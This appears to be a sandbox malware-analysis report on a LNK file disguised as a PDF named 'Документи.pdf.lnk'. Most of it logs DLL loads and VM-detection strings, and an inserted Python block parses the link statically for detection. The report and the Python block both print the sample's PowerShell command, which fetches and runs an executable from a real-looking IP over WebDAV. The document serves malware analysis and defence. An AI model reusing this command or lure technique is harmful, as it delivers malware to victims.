Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cloudexperiencehostbroker.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: credui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wdscore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: networkuxbroker.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wpdshserviceobj.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ethernetmediamanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: portabledevicetypes.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: portabledeviceapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscobj.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ncsi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: srchadmin.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: synccenter.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: imapi2.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ieproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: settingsync.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: settingsynccore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wpnapps.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.xaml.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowsinternal.composableshell.desktophosting.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uiamanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Hooking and other Techniques for Hiding and Protection

Source: Possible double extension: pdf.lnk | Static PE information: #U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (71 identical entries)
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX (37 identical entries)
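The two entries in this report that decide triage, that the LNK's own target launches powershell.exe and that the file name carries a decoy .pdf in front of .lnk, can both be established without detonation from the Shell Link (MS-SHLLINK) StringData fields. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses a minimal .lnk, decodes the report's #Uxxxx-escaped sample name, and flags the double extension and the script-host target. The .lnk bytes are constructed inside the block from the command line shown in this report; the relative path to powershell.exe and the icon location are assumptions, since the report does not show those fields.

```python
import re
import struct

# MS-SHLLINK: ShellLinkHeader is 0x4C bytes; LinkFlags live at offset 20.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
# StringData fields follow in this fixed order, each present only if its flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|jpe?g|png|txt)\.lnk$", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def decode_report_name(name: str) -> str:
    """Turn the report's #Uxxxx escapes back into characters."""
    return re.sub(r"#U([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), name)


def parse_lnk(data: bytes) -> dict:
    """Read the StringData of a .lnk statically; nothing is resolved or executed."""
    if (len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:   # IDListSize does not count its own 2 bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:             # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    info = {"flags": flags}
    for bit, field in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no NUL
            pos += 2
            info[field] = data[pos:pos + count * width].decode(codec)
            pos += count * width
    return info


def static_findings(filename: str, info: dict) -> list:
    """Static indicators: decoy extension and a script host as the link target."""
    findings = []
    if DOUBLE_EXT.search(filename):
        findings.append("double_extension")
    target = info.get("relative_path", "").rsplit("\\", 1)[-1].lower()
    if target in SCRIPT_HOSTS:
        findings.append("target_is_script_host:" + target)
    return findings


def build_lnk(relative_path: str, arguments: str, icon_location: str) -> bytes:
    """Constructed minimal .lnk for offline testing; these are not the sample's bytes."""
    flags = (HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS
             | HAS_ICON_LOCATION | IS_UNICODE)
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    item = b"\x1f\x00"                                    # placeholder ItemID payload
    idlist = struct.pack("<H", 2 + len(item)) + item + b"\x00\x00"   # TerminalID

    def s(text):                                          # CountCharacters + UTF-16LE
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return (header + struct.pack("<H", len(idlist)) + idlist
            + s(relative_path) + s(arguments) + s(icon_location))


# Command line from the report; relative path and icon location are assumptions.
SAMPLE_NAME = decode_report_name(
    "#U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk")
SAMPLE_ARGS = (r'''-c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; '''
               r'''Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe''')
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       SAMPLE_ARGS, r"%SystemRoot%\System32\shell32.dll")

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE_LNK)
    print(SAMPLE_NAME, parsed["relative_path"], parsed["arguments"], sep="\n")
    print(static_findings(SAMPLE_NAME, parsed))
```

The parser deliberately skips the LinkTargetIDList and LinkInfo blocks by their declared sizes rather than interpreting them, because the command line that matters lives in COMMAND_LINE_ARGUMENTS; a real sample will usually also carry a LinkInfo block and ExtraData, which this reader tolerates by size but does not decode.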

Malware Analysis System Evasion

Source: C:\Windows\explorer.exe | System information queried: FirmwareTableInformation
Source: C:\Windows\explorer.exe | File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5715
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4103
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 786
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 759
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652 | Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4148 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8116 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000003.00000003.1825207679.000000000B907000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:=>
Source: explorer.exe, 00000003.00000003.1825207679.000000000B991000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
Source: explorer.exe, 00000003.00000003.1825207679.000000000B991000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\N
Source: explorer.exe, 00000003.00000002.4133682292.00000000085C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000003.00000003.1725367782.0000000008617000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: explorer.exe, 00000003.00000002.4130042009.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000E
Source: explorer.exe, 00000002.00000002.1709940016.000000000127A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1770312521.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1771280620.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768583338.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3817790448.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1774936994.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1793770874.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1782359564.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767560781.000000000887E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000003.1825207679.000000000B991000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000003.00000002.4138843117.000000000B959000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000003.00000003.1825207679.000000000B991000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}dll
Source: explorer.exe, 00000003.00000003.1803683982.000000000B991000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.1767052707.000000000883D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00L
Source: explorer.exe, 00000003.00000003.1820943668.000000000B991000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\e\
Source: explorer.exe, 00000003.00000002.4133682292.00000000085BB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: explorer.exe, 00000003.00000003.1825207679.000000000B991000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l
Source: explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
Source: svchost.exe, 00000004.00000002.3388196191.00000284AAE2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW zE
Source: explorer.exe, 00000003.00000002.4133682292.00000000085C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000003.3817790448.0000000008944000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000003.00000002.4130042009.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000005
Source: explorer.exe, 00000003.00000003.2973453870.000000000887E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000H
Source: explorer.exe, 00000003.00000003.1821511866.000000000B888000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: War&Prod_VMware_0
Source: explorer.exe, 00000003.00000003.1820943668.000000000B991000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\3
Source: explorer.exe, 00000003.00000003.1825207679.000000000B991000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000@v
Source: explorer.exe, 00000003.00000003.1767052707.0000000008789000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768180926.00000000087BB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWZ
Source: explorer.exe, 00000003.00000003.1725367782.0000000008617000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.2973453870.00000000088D6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000003.1820943668.000000000B991000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000003.00000003.1725367782.00000000085FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}dows_NTPath=C:\Program Fi@}
Source: explorer.exe, 00000003.00000003.1820943668.000000000B991000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}9507e
Source: explorer.exe, 00000003.00000003.1825207679.000000000B907000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 00000003.00000003.2976404480.00000000085E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3819733930.00000000085E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133811243.00000000085E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWystem32\DriverStore\en-GB\rdpbus.inf_locN%3
Source: explorer.exe, 00000003.00000003.1825207679.000000000B991000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: explorer.exe, 00000003.00000003.1819559891.000000000BA31000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: om&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.1725367782.00000000085FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: explorer.exe, 00000003.00000003.1820943668.000000000B931000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.4130042009.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NXTftVMWare
Source: explorer.exe, 00000003.00000003.2973453870.0000000008727000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.0000000008789000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1775141662.0000000008789000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1771280620.0000000008798000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1769205502.0000000008798000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768180926.00000000087BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.0000000008727000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3817790448.0000000008727000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWPKc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | Network Connect: 77.105.161.194 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" \\77.105.161.194@80\file\
Source: explorer.exe, 00000003.00000002.4133228899.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4132522253.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.4133228899.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130042009.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman
